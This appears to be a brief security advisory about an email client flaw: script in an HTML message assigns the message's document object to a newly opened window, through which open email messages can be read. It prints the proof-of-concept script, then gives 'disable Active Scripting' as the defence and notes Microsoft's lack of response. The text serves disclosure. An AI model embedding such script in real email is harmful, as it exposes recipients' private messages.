The problem is assigning the document object of the email message to a variable in a newly
opened window. Thru this variable access is possible to open email messages.

The code that must be included in HTML message is :
-------------------------------------------------
<SCRIPT>
a=window.open("about:<A HREF="javascript:alert(x.body.innerText)" >Click
here to see the active message</A>");
a.x=window.document;
</SCRIPT>
-------------------------------------------------

DEFENSE

Disable Active Scripting

VENDOR RESPONSE

Microsoft is aware of the issue however no response was
known at the time of this writing.